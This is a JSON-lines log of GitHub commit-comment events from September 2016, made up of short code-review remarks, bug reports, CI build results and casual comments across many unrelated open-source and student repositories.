{"id":"4614621896","type":"CommitCommentEvent","actor":{"login":"Damnian"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164423,"position":27,"line":27,"path":"index.html","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T17:41:30Z","updated_at":"2016-09-25T17:41:30Z","body":"this line was deleted"}},"created_at":"2016-09-25T17:41:30Z"}
{"id":"4614622278","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"google-aosp/android_frameworks_av"},"payload":{"comment":{"id":19164426,"position":null,"line":null,"path":null,"commit_id":"d8d4994ad2e9bfcb39982e55b177b3f9424fcffc","created_at":"2016-09-25T17:41:45Z","updated_at":"2016-09-25T17:41:45Z","body":"No (because Dirty Unicorns is more CM-based than pure AOSP)"}},"created_at":"2016-09-25T17:41:45Z"}
{"id":"4614622506","type":"CommitCommentEvent","actor":{"login":"JellyBool"},"repo":{"name":"laravel/laravel"},"payload":{"comment":{"id":19164427,"position":null,"line":null,"path":null,"commit_id":"76db1006cca54f0364b313bef604ac59c5f9b1f0","created_at":"2016-09-25T17:41:53Z","updated_at":"2016-09-25T17:41:53Z","body":"@neindk Yeah, both works fine for me .\r\n\r\nI just tested it out and come back, graceful to see @craigpaul comment."}},"created_at":"2016-09-25T17:41:53Z"}
{"id":"4614622948","type":"CommitCommentEvent","actor":{"login":"MaximDanilov"},"repo":{"name":"MaximDanilov/GIIS"},"payload":{"comment":{"id":19164431,"position":null,"line":null,"path":null,"commit_id":"a861894cf8b9be88744e5b0bc12e6477b20210e5","created_at":"2016-09-25T17:42:15Z","updated_at":"2016-09-25T17:42:15Z","body":"С квадрантами"}},"created_at":"2016-09-25T17:42:15Z"}
{"id":"4614623715","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"google-aosp/android_frameworks_av"},"payload":{"comment":{"id":19164434,"position":null,"line":null,"path":null,"commit_id":"d8d4994ad2e9bfcb39982e55b177b3f9424fcffc","created_at":"2016-09-25T17:42:49Z","updated_at":"2016-09-25T17:42:49Z","body":"-_- Why you don't understand what i am trying to say! Just do what you want."}},"created_at":"2016-09-25T17:42:49Z"}
{"id":"4614624004","type":"CommitCommentEvent","actor":{"login":"richarddurbin"},"repo":{"name":"GFA-spec/GFA-spec"},"payload":{"comment":{"id":19164435,"position":null,"line":null,"path":null,"commit_id":"eab4c4e335e7243e13f902007bf3bae5889e21d9","created_at":"2016-09-25T17:43:02Z","updated_at":"2016-09-25T17:43:02Z","body":"I think in GFA2.Fig1.png for the Edge (general) drawing that end2 should be to the left and beg2 to the right.  As you traverse sid, beg2 should be a lower coordinate than end2.  The '-' sign for the direction of alignment indicates that you reverse complement [beg2,end2) to align to [beg1,end1), so the complement of the base prior to the end2 interbase mark in sid2 aligns to the base following the beg1 interbase mark in sid1."}},"created_at":"2016-09-25T17:43:02Z"}
{"id":"4614628785","type":"CommitCommentEvent","actor":{"login":"jorgedelmo"},"repo":{"name":"ocamor188/CFC"},"payload":{"comment":{"id":19164456,"position":null,"line":null,"path":null,"commit_id":"52d87f652b738e1aebd1fc6a66a52bff7affc67f","created_at":"2016-09-25T17:46:21Z","updated_at":"2016-09-25T17:46:21Z","body":"Funcion utilitaria para actualizar la fecha de los registros de la tabla pivot al dia actual. \r\nSe debe ejectuar siempre que se quiera ver el funcionamiento del grafico"}},"created_at":"2016-09-25T17:46:21Z"}
{"id":"4614632298","type":"CommitCommentEvent","actor":{"login":"n1kolaa"},"repo":{"name":"n1kolaa/android_device_samsung_tuna-1"},"payload":{"comment":{"id":19164469,"position":20,"line":41,"path":"sepolicy/file_contexts","commit_id":"8da5c1ce18be5cdd6455cfc8dee6f3360f49b69b","created_at":"2016-09-25T17:48:51Z","updated_at":"2016-09-25T17:48:51Z","body":"need to readd"}},"created_at":"2016-09-25T17:48:51Z"}
{"id":"4614632490","type":"CommitCommentEvent","actor":{"login":"Juhoartturi"},"repo":{"name":"tapooll/TextBasedMeme"},"payload":{"comment":{"id":19164472,"position":29,"line":503,"path":"TextBasedMeme/src/koodi/peli.java","commit_id":"82d6d2296419731b9b6eaab8df3df35d179bd564","created_at":"2016-09-25T17:49:00Z","updated_at":"2016-09-25T17:49:00Z","body":"aiot*"}},"created_at":"2016-09-25T17:49:00Z"}
{"id":"4614632578","type":"CommitCommentEvent","actor":{"login":"rockdaboot"},"repo":{"name":"rockdaboot/libpsl"},"payload":{"comment":{"id":19164473,"position":18,"line":1716,"path":"src/psl.c","commit_id":"32543dd5a507a10eb2dae9b1b7092c77965f6486","created_at":"2016-09-25T17:49:04Z","updated_at":"2016-09-25T17:49:04Z","body":"Again very nice idea. I checked the source code for u8_tolower() - it would start with 64 bytes and increase by a factor of two when needed. With the last param (&len) we can override the start len for malloc. Not 100% sure, but I guess lowercasing utf-8 will normally not increase the string length. So I take the src length (incl. 0 byte) as start for malloc."}},"created_at":"2016-09-25T17:49:04Z"}
{"id":"4614634860","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"google-aosp/android_frameworks_av"},"payload":{"comment":{"id":19164479,"position":null,"line":null,"path":null,"commit_id":"d8d4994ad2e9bfcb39982e55b177b3f9424fcffc","created_at":"2016-09-25T17:50:41Z","updated_at":"2016-09-25T17:50:41Z","body":"So, can I combine aosp-7.0 and du-m commit reverts?"}},"created_at":"2016-09-25T17:50:41Z"}
{"id":"4614636392","type":"CommitCommentEvent","actor":{"login":"bean1810"},"repo":{"name":"bean1810/Test"},"payload":{"comment":{"id":19164483,"position":null,"line":null,"path":null,"commit_id":"1bc59b4099c558d3287d0a26d508a932d33be6d7","created_at":"2016-09-25T17:51:47Z","updated_at":"2016-09-25T17:51:47Z","body":"fds"}},"created_at":"2016-09-25T17:51:47Z"}
{"id":"4614636474","type":"CommitCommentEvent","actor":{"login":"thomasjbradley"},"repo":{"name":"aaryllins/html-validation-fixes"},"payload":{"comment":{"id":19164484,"position":null,"line":null,"path":null,"commit_id":"98641fd3169f6bfdd72971879eebcb0cc84bff49","created_at":"2016-09-25T17:51:50Z","updated_at":"2016-09-25T17:51:50Z","body":"The `index.html` file has a capital letter in it—on GitHub.\r\n\r\nYou'll have to rename it to something completely different like `blah.html`, commit it, then rename it back to have the correct capitalization."}},"created_at":"2016-09-25T17:51:50Z"}
{"id":"4614636667","type":"CommitCommentEvent","actor":{"login":"bean1810"},"repo":{"name":"bean1810/Test"},"payload":{"comment":{"id":19164485,"position":null,"line":null,"path":null,"commit_id":"1bc59b4099c558d3287d0a26d508a932d33be6d7","created_at":"2016-09-25T17:52:00Z","updated_at":"2016-09-25T17:52:00Z","body":"a"}},"created_at":"2016-09-25T17:52:00Z"}
{"id":"4614637208","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"google-aosp/android_frameworks_av"},"payload":{"comment":{"id":19164486,"position":null,"line":null,"path":null,"commit_id":"d8d4994ad2e9bfcb39982e55b177b3f9424fcffc","created_at":"2016-09-25T17:52:23Z","updated_at":"2016-09-25T17:52:23Z","body":"Don't relate it with DU, what we are doing actually is, we are using cyanogen frameworks av, but since it has some own dependencies, we revert those from source. "}},"created_at":"2016-09-25T17:52:23Z"}
{"id":"4614638147","type":"CommitCommentEvent","actor":{"login":"reaperrr"},"repo":{"name":"OpenRA/OpenRA"},"payload":{"comment":{"id":19164491,"position":32,"line":288,"path":"mods/ra/weapons/missiles.yaml","commit_id":"86ad7576cefa51e7fcb1042af546b703bed2b002","created_at":"2016-09-25T17:53:03Z","updated_at":"2016-09-25T17:53:03Z","body":"`RangeLimit` has been changed from ticks to distance, so you need to add a range value here (something like `6c0`)."}},"created_at":"2016-09-25T17:53:03Z"}
{"id":"4614640242","type":"CommitCommentEvent","actor":{"login":"lubdrop"},"repo":{"name":"jomsdev/SVCC_PayPal"},"payload":{"comment":{"id":19164496,"position":null,"line":null,"path":null,"commit_id":"f88aa8f2deebcbeb7c9e4b7abe6e3bde7dff8d06","created_at":"2016-09-25T17:54:31Z","updated_at":"2016-09-25T17:54:31Z","body":"route url to user page but does not select the correct user"}},"created_at":"2016-09-25T17:54:31Z"}
{"id":"4614640640","type":"CommitCommentEvent","actor":{"login":"Anplante"},"repo":{"name":"Anplante/tf_scrabble"},"payload":{"comment":{"id":19164498,"position":null,"line":null,"path":null,"commit_id":"b33508d5c60a4e2c74b0d5954f0e8ab66ca14785","created_at":"2016-09-25T17:54:48Z","updated_at":"2016-09-25T17:54:48Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [mettre des noms aleatoire pour les aI - 2](https://trello.com/c/OvOVRzF6/26-mettre-des-noms-aleatoire-pour-les-ai-2)"}},"created_at":"2016-09-25T17:54:48Z"}
{"id":"4614642726","type":"CommitCommentEvent","actor":{"login":"AlanMorel"},"repo":{"name":"Maxcloud/Mushy"},"payload":{"comment":{"id":19164502,"position":null,"line":null,"path":null,"commit_id":"4600f87a5a50c8c0d2ac85c05d3bc967733f4ac4","created_at":"2016-09-25T17:56:14Z","updated_at":"2016-09-25T17:56:14Z","body":"Perhaps make a method to handle if an op should be printed or not, rather than just keep extending that if condition."}},"created_at":"2016-09-25T17:56:14Z"}
{"id":"4614643722","type":"CommitCommentEvent","actor":{"login":"kovetskiy"},"repo":{"name":"ardagnir/athame"},"payload":{"comment":{"id":19164506,"position":null,"line":null,"path":null,"commit_id":"61554483a612f93f917e64d1c3f7f25bc96dff85","created_at":"2016-09-25T17:56:56Z","updated_at":"2016-09-25T17:56:56Z","body":"nice catch"}},"created_at":"2016-09-25T17:56:56Z"}
{"id":"4614649892","type":"CommitCommentEvent","actor":{"login":"ozkriff"},"repo":{"name":"Gexon/loginserver"},"payload":{"comment":{"id":19164532,"position":8,"line":12,"path":"src/commands.rs","commit_id":"5872c58af686472a63bd46a79bbc647630abce81","created_at":"2016-09-25T18:00:53Z","updated_at":"2016-09-25T18:00:53Z","body":"есть метод `.is_ok()`"}},"created_at":"2016-09-25T18:00:53Z"}
{"id":"4614651934","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19164539,"position":1,"line":1,"path":"main.js","commit_id":"b9e52fadb904f2b3e5647b46b28e9faf3aa9a33d","created_at":"2016-09-25T18:02:09Z","updated_at":"2016-09-25T18:02:09Z","body":"a"}},"created_at":"2016-09-25T18:02:09Z"}
{"id":"4614653185","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19164545,"position":2,"line":1,"path":"main.js","commit_id":"b9e52fadb904f2b3e5647b46b28e9faf3aa9a33d","created_at":"2016-09-25T18:03:01Z","updated_at":"2016-09-25T18:03:01Z","body":"With an additional role, we should be able to add another creep without running in to crowding issues. Moving to the extensions takes a bit longer than to the room controller."}},"created_at":"2016-09-25T18:03:01Z"}
{"id":"4614654789","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19164552,"position":31,"line":29,"path":"main.js","commit_id":"b9e52fadb904f2b3e5647b46b28e9faf3aa9a33d","created_at":"2016-09-25T18:04:05Z","updated_at":"2016-09-25T18:04:05Z","body":"Could add a `break` here, but there shouldn't be more than [four](https://github.com/sethten/screeps/commit/b9e52fadb904f2b3e5647b46b28e9faf3aa9a33d?diff=unified#diff-7a9076d6d94e62c13d641aa71f19ae8eR1) entries in this array and I didn't want to add braces."}},"created_at":"2016-09-25T18:04:05Z"}
{"id":"4614656527","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19164561,"position":null,"line":null,"path":null,"commit_id":"e37e09cd8e3f3695fd6c95ef7faaabf2659e34ab","created_at":"2016-09-25T18:05:18Z","updated_at":"2016-09-25T18:05:18Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: OK (2324 of 2496 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e37e09cd8e3f3695fd6c95ef7faaabf2659e34ab-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e37e09cd8e3f3695fd6c95ef7faaabf2659e34ab-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.11%25-yellow.svg)</a> \n"}},"created_at":"2016-09-25T18:05:18Z"}
{"id":"4614656587","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19164562,"position":6,"line":6,"path":"task.build.js","commit_id":"b9e52fadb904f2b3e5647b46b28e9faf3aa9a33d","created_at":"2016-09-25T18:05:20Z","updated_at":"2016-09-25T18:05:20Z","body":"Include `targets &&` to make sure it has a zeroth value before trying to access it. If there is nothing left to build there will be no targets. Actually, I should have it go back to hauling then..."}},"created_at":"2016-09-25T18:05:20Z"}
{"id":"4614657090","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164563,"position":2,"line":2,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T18:05:39Z","updated_at":"2016-09-25T18:05:39Z","body":"Why did you decide to use this particular font size?"}},"created_at":"2016-09-25T18:05:39Z"}
{"id":"4614660055","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164573,"position":1,"line":1,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T18:07:34Z","updated_at":"2016-09-25T18:07:34Z","body":"I suggest you to start using some code beautify plugin in your editor. Formatting like `html{` is not acceptable (it should be `html {`."}},"created_at":"2016-09-25T18:07:34Z"}
{"id":"4614660918","type":"CommitCommentEvent","actor":{"login":"Flarp"},"repo":{"name":"Flarp/Distri-Node"},"payload":{"comment":{"id":19164575,"position":null,"line":null,"path":null,"commit_id":"f50426061491413c45fe24a4f1fb67879121b6de","created_at":"2016-09-25T18:08:06Z","updated_at":"2016-09-25T18:08:06Z","body":"#1 "}},"created_at":"2016-09-25T18:08:06Z"}
{"id":"4614662746","type":"CommitCommentEvent","actor":{"login":"Hafeez00"},"repo":{"name":"Hafeez00/Pipeline_jenkins_assignment"},"payload":{"comment":{"id":19164579,"position":null,"line":null,"path":null,"commit_id":"beb9d62790ddb038790e3f939cc1870e4a6f35dd","created_at":"2016-09-25T18:09:18Z","updated_at":"2016-09-25T18:09:18Z","body":"this is a test."}},"created_at":"2016-09-25T18:09:18Z"}
{"id":"4614662960","type":"CommitCommentEvent","actor":{"login":"Flarp"},"repo":{"name":"Flarp/Distri-Node"},"payload":{"comment":{"id":19164580,"position":null,"line":null,"path":null,"commit_id":"f911c8f2c3f67488443e2c80f0d8e291486f98b5","created_at":"2016-09-25T18:09:26Z","updated_at":"2016-09-25T18:09:26Z","body":"#1 "}},"created_at":"2016-09-25T18:09:26Z"}
{"id":"4614666013","type":"CommitCommentEvent","actor":{"login":"jovo"},"repo":{"name":"neurodata/MGC"},"payload":{"comment":{"id":19164592,"position":null,"line":null,"path":null,"commit_id":"2a11736aa4c29c2638b4d6f90219b38570bf4402","created_at":"2016-09-25T18:11:33Z","updated_at":"2016-09-25T18:11:33Z","body":"@cshen6 i don't think you pushed all the changes.\r\nwhen i run the code, for example, i don't see enumerated pairs, etc."}},"created_at":"2016-09-25T18:11:33Z"}
{"id":"4614672081","type":"CommitCommentEvent","actor":{"login":"terminalmage"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19164608,"position":null,"line":null,"path":null,"commit_id":"6985a456239766237a831153b7e7636c7d0dd051","created_at":"2016-09-25T18:15:49Z","updated_at":"2016-09-25T18:15:49Z","body":"@damon-atkins added in https://github.com/terminalmage/salt/commit/a541679"}},"created_at":"2016-09-25T18:15:49Z"}
{"id":"4614672387","type":"CommitCommentEvent","actor":{"login":"josemvm"},"repo":{"name":"3liz/lizmap-plugin"},"payload":{"comment":{"id":19164610,"position":null,"line":null,"path":null,"commit_id":"5f30d53538205b29a60463b7fca683f409ddba4b","created_at":"2016-09-25T18:16:01Z","updated_at":"2016-09-25T18:16:01Z","body":"hi @mdouchin,\r\n\r\nwhen qgis 2.14 (or qgis 2.16) try to load the plugin with this commit this error appears:\r\n\r\nCouldn't load plugin lizmap due to an error when calling its classFactory() method \r\n\r\nTraceback (most recent call last):\r\n  File \"C:/PROGRA~1/QGISES~1/apps/qgis/./python\\qgis\\utils.py\", line 306, in startPlugin\r\n    plugins[packageName] = package.classFactory(iface)\r\n  File \"C:/Users/ze_macau.CMARL.PT/.qgis2/python/plugins\\lizmap\\__init__.py\", line 75, in classFactory\r\n    from lizmap import lizmap\r\n  File \"C:/PROGRA~1/QGISES~1/apps/qgis/./python\\qgis\\utils.py\", line 572, in _import\r\n    mod = _builtin_import(name, globals, locals, fromlist, level)\r\n  File \"C:/Users/ze_macau.CMARL.PT/.qgis2/python/plugins\\lizmap\\lizmap.py\", line 56, in \r\n    from lizmapdialog import lizmapDialog\r\n  File \"C:/PROGRA~1/QGISES~1/apps/qgis/./python\\qgis\\utils.py\", line 572, in _import\r\n    mod = _builtin_import(name, globals, locals, fromlist, level)\r\n  File \"C:/Users/ze_macau.CMARL.PT/.qgis2/python/plugins\\lizmap\\lizmapdialog.py\", line 56, in \r\n    os.path.dirname(__file__), 'ui_lizmap.ui'))\r\n  File \"C:\\PROGRA~1\\QGISES~1\\apps\\Python27\\lib\\site-packages\\PyQt4\\uic\\__init__.py\", line 213, in loadUiType\r\n    exec(code_string.getvalue(), ui_globals)\r\n  File \"\", line 1728, in \r\n  File \"C:/PROGRA~1/QGISES~1/apps/qgis/./python\\qgis\\utils.py\", line 572, in _import\r\n    mod = _builtin_import(name, globals, locals, fromlist, level)\r\nImportError: No module named qgscollapsiblegroupbox\r\n\r\nPython version: 2.7.5 (default, May 15 2013, 22:44:16) [MSC v.1500 64 bit (AMD64)] \r\nQGIS version: 2.14.3-Essen Essen, cf2ebb8\r\n\r\nthanks for your attention "}},"created_at":"2016-09-25T18:16:01Z"}
{"id":"4614672831","type":"CommitCommentEvent","actor":{"login":"SivanMehta"},"repo":{"name":"SivanMehta/wander"},"payload":{"comment":{"id":19164613,"position":4,"line":37,"path":"package.json","commit_id":"caa9e2651f02134065fbf2abafbbcd9b769865ba","created_at":"2016-09-25T18:16:20Z","updated_at":"2016-09-25T18:16:20Z","body":"This allows use to have fun-sounding trip names like `neighborhood-street-visitor-late-leaving`"}},"created_at":"2016-09-25T18:16:20Z"}
{"id":"4614674637","type":"CommitCommentEvent","actor":{"login":"nanpuyue"},"repo":{"name":"nanpuyue/shadowsocks-qt5"},"payload":{"comment":{"id":19164616,"position":null,"line":null,"path":null,"commit_id":"f4ff0d683c097c09ef2ffa26b3bb0e8192817f22","created_at":"2016-09-25T18:17:28Z","updated_at":"2016-09-25T18:17:28Z","body":"Before:\r\n![before](https://cloud.githubusercontent.com/assets/1524609/18817278/4e67a6ee-838f-11e6-8a73-bab18ef218cb.jpg)\r\n\r\nAfter:\r\n![after](https://cloud.githubusercontent.com/assets/1524609/18817279/52dec52c-838f-11e6-8291-04319fd551dc.jpg)\r\n"}},"created_at":"2016-09-25T18:17:28Z"}
{"id":"4614675805","type":"CommitCommentEvent","actor":{"login":"justinclift"},"repo":{"name":"sqlitebrowser/sqlitebrowser"},"payload":{"comment":{"id":19164620,"position":null,"line":null,"path":null,"commit_id":"b9dd11df538bcd084b7b18b9fe142574c3a4f2f1","created_at":"2016-09-25T18:18:13Z","updated_at":"2016-09-25T18:18:13Z","body":"Looks like `QString::toHtmlEscaped()` was introduced in Qt5.0.\r\n\r\nThe \"API changes\" doc mentions it is the replacement for `Qt::escape()`.  Maybe that will work well enough?"}},"created_at":"2016-09-25T18:18:13Z"}
{"id":"4614677998","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19164623,"position":null,"line":null,"path":null,"commit_id":"958ab074a177b453bbdb4c05fea74cc1f0567232","created_at":"2016-09-25T18:19:41Z","updated_at":"2016-09-25T18:19:41Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2299 of 2496 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-958ab074a177b453bbdb4c05fea74cc1f0567232-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-958ab074a177b453bbdb4c05fea74cc1f0567232-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.11%25-yellow.svg)</a> \n"}},"created_at":"2016-09-25T18:19:41Z"}
{"id":"4614684190","type":"CommitCommentEvent","actor":{"login":"macloo"},"repo":{"name":"KRRodriguez/CSS-assignment-2"},"payload":{"comment":{"id":19164636,"position":null,"line":null,"path":null,"commit_id":"25e7e4ca5910febac8d6365ff36b9390d92556d0","created_at":"2016-09-25T18:23:44Z","updated_at":"2016-09-25T18:23:44Z","body":"This is a commit with all your changes, including your two new files. "}},"created_at":"2016-09-25T18:23:44Z"}
{"id":"4614684264","type":"CommitCommentEvent","actor":{"login":"rarahat02"},"repo":{"name":"rarahat02/PoliceApp"},"payload":{"comment":{"id":19164638,"position":3,"line":3,"path":"README.md","commit_id":"09b2aa7d6d25f99c360c7d148fc54afbc296c0c7","created_at":"2016-09-25T18:23:47Z","updated_at":"2016-09-25T18:23:47Z","body":"#### Web app part of the project is here: http://erphs.comli.com \r\n## Screenshots of the app\r\n### 1. After successfully connected with server\r\n ![13](https://cloud.githubusercontent.com/assets/12351957/18817220/4938d18c-837d-11e6-849e-9ce704df7d8c.PNG)\r\n### 2. Receive a notification from a victim (including victim's phone number & personal message) \r\n![14](https://cloud.githubusercontent.com/assets/12351957/18817222/596cf6f0-837d-11e6-89c8-e3b05e1fd946.PNG)\r\n### 3. Show victim's exact location on map\r\n![15](https://cloud.githubusercontent.com/assets/12351957/18817224/639d6c22-837d-11e6-84a8-9897124cfc7e.PNG)\r\n\r\n"}},"created_at":"2016-09-25T18:23:47Z"}
{"id":"4614684715","type":"CommitCommentEvent","actor":{"login":"jalal1993"},"repo":{"name":"vysheng/tg"},"payload":{"comment":{"id":19164642,"position":null,"line":null,"path":null,"commit_id":"ea4289967175e9bfd83aa74199355307e8967229","created_at":"2016-09-25T18:24:05Z","updated_at":"2016-09-25T18:24:05Z","body":"."}},"created_at":"2016-09-25T18:24:05Z"}
{"id":"4614684822","type":"CommitCommentEvent","actor":{"login":"Rondom"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":19164643,"position":null,"line":null,"path":null,"commit_id":"7960517074f7a7e84ebbb95bf128c4ae519102ee","created_at":"2016-09-25T18:24:09Z","updated_at":"2016-09-25T18:24:09Z","body":"I did some quick debugging (added some `Write-Host`s between each line) and I conclude it is NOT a Cygwin-problem, but a file-download problem. The files are downloaded, but execution hangs BEFORE the setupCygwin-call and even BEFORE the function declaration.\r\nWhere is this Start-FileDownload documented?  I guess you have more of a clue about PowerShell. Maybe it is as easy as replacing `Start-Filedownload` with `Invoke-WebRequest`?"}},"created_at":"2016-09-25T18:24:09Z"}
{"id":"4614686251","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19164647,"position":null,"line":null,"path":null,"commit_id":"958ab074a177b453bbdb4c05fea74cc1f0567232","created_at":"2016-09-25T18:25:07Z","updated_at":"2016-09-25T18:25:07Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-958ab074a177b453bbdb4c05fea74cc1f0567232-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-25T18:25:07Z"}
{"id":"4614691367","type":"CommitCommentEvent","actor":{"login":"Nuffic"},"repo":{"name":"henno/halo"},"payload":{"comment":{"id":19164656,"position":null,"line":null,"path":null,"commit_id":"902a32e1ce12dae3eae8c4d55ae1c83d4fde7a3b","created_at":"2016-09-25T18:28:38Z","updated_at":"2016-09-25T18:28:38Z","body":"Short open tag still used here - [https://github.com/henno/halo/blob/902a32e1ce12dae3eae8c4d55ae1c83d4fde7a3b/system/functions.php#L1](url)"}},"created_at":"2016-09-25T18:28:38Z"}
{"id":"4614691774","type":"CommitCommentEvent","actor":{"login":"nanpuyue"},"repo":{"name":"nanpuyue/shadowsocks-qt5"},"payload":{"comment":{"id":19164657,"position":null,"line":null,"path":null,"commit_id":"f4ff0d683c097c09ef2ffa26b3bb0e8192817f22","created_at":"2016-09-25T18:28:53Z","updated_at":"2016-09-25T18:28:53Z","body":"[shadowsocks-qt5_2.7.0-1_amd64.deb.zip](https://github.com/nanpuyue/shadowsocks-qt5/files/491815/shadowsocks-qt5_2.7.0-1_amd64.deb.zip)\r\n"}},"created_at":"2016-09-25T18:28:53Z"}
{"id":"4614692087","type":"CommitCommentEvent","actor":{"login":"coodie"},"repo":{"name":"cahirwpz/mimiker"},"payload":{"comment":{"id":19164660,"position":null,"line":null,"path":null,"commit_id":"de809280536175a3e0cedf7f700bd204b6500e2d","created_at":"2016-09-25T18:29:06Z","updated_at":"2016-09-25T18:29:06Z","body":"When it comes to third task it appears it's quite obvious that only the second way (with extending page table) is possible. According to documentation:\r\n\r\n \"These bits are ignored on write and return zero on read.\"\r\n\r\nBecause they are used to implement read_inhibit and execute_inhibit on newer MIPS architectures.\r\nAnd keep in mind we can only update those bits when entry isn't in TLB."}},"created_at":"2016-09-25T18:29:06Z"}
{"id":"4614694888","type":"CommitCommentEvent","actor":{"login":"baladurzgate"},"repo":{"name":"baladurzgate/LAMUSEE"},"payload":{"comment":{"id":19164671,"position":null,"line":null,"path":null,"commit_id":"0d3e342a595c48917712770dbf6aca2a1cae04ba","created_at":"2016-09-25T18:30:54Z","updated_at":"2016-09-25T18:30:54Z","body":"#37 "}},"created_at":"2016-09-25T18:30:54Z"}
{"id":"4614695676","type":"CommitCommentEvent","actor":{"login":"LEGOlord208"},"repo":{"name":"LEGOlord208/PixelCamMod"},"payload":{"comment":{"id":19164675,"position":null,"line":null,"path":null,"commit_id":"6d47a77b100b34813b552db552e3455adec5d87e","created_at":"2016-09-25T18:31:26Z","updated_at":"2016-09-25T18:31:26Z","body":"Uh I'm stupid. Please ignore this request"}},"created_at":"2016-09-25T18:31:26Z"}
{"id":"4614696379","type":"CommitCommentEvent","actor":{"login":"sangisos"},"repo":{"name":"sangisos/gocc"},"payload":{"comment":{"id":19164679,"position":null,"line":null,"path":null,"commit_id":"a8a9bd1702390e2c27358703b48191ebc08c6c55","created_at":"2016-09-25T18:31:53Z","updated_at":"2016-09-25T18:31:53Z","body":"This fix does not take care of the debug printouts or update the files updated by go generate, if any. I'm thinking you might want to clean up debug print statements in this file anyway."}},"created_at":"2016-09-25T18:31:53Z"}
{"id":"4614697515","type":"CommitCommentEvent","actor":{"login":"Nuffic"},"repo":{"name":"Nuffic/halo"},"payload":{"comment":{"id":19164680,"position":8,"line":8,"path":"config.sample.php","commit_id":"19cee0ac1d8a6a711751e87d15ca3f776d9b6e27","created_at":"2016-09-25T18:32:38Z","updated_at":"2016-09-25T18:32:38Z","body":"this is not needed here anymore since its checked in index.php already"}},"created_at":"2016-09-25T18:32:38Z"}
{"id":"4614698242","type":"CommitCommentEvent","actor":{"login":"Ondalf"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19164683,"position":null,"line":null,"path":null,"commit_id":"a07a7a9eabe45ee64e9c8984aaaf982fa08e1724","created_at":"2016-09-25T18:33:08Z","updated_at":"2016-09-25T18:33:08Z","body":"Oh, I was about to say about line 23 of behaviour.miner... You forgot \"let\" again there. Seems I need to update to the HEAD."}},"created_at":"2016-09-25T18:33:08Z"}
{"id":"4614699414","type":"CommitCommentEvent","actor":{"login":"Liryna"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":19164685,"position":null,"line":null,"path":null,"commit_id":"7960517074f7a7e84ebbb95bf128c4ae519102ee","created_at":"2016-09-25T18:33:58Z","updated_at":"2016-09-25T18:33:58Z","body":"😮 !!!\r\n`Start-Filedownload` come from appveyor https://www.appveyor.com/docs/how-to/download-file/#start-filedownload-cmdlet\r\n\r\nI replaced it with wget https://github.com/dokan-dev/dokany/commit/3361dbf7e681d45d71753b2931967e0bd700e492\r\nand it worked ! ❤️  https://ci.appveyor.com/project/Maxhy/dokany/branch/master/job/fe06swugxn2q0ldw\r\n\r\nThank you @Rondom and well found !"}},"created_at":"2016-09-25T18:33:58Z"}
{"id":"4614700704","type":"CommitCommentEvent","actor":{"login":"Liryna"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":19164691,"position":null,"line":null,"path":null,"commit_id":"7960517074f7a7e84ebbb95bf128c4ae519102ee","created_at":"2016-09-25T18:34:54Z","updated_at":"2016-09-25T18:34:54Z","body":"An issue is already opened on appveyor forum http://help.appveyor.com/discussions/problems/5308-ci-frequently-hangs-with-recent-image-update 👍 "}},"created_at":"2016-09-25T18:34:54Z"}
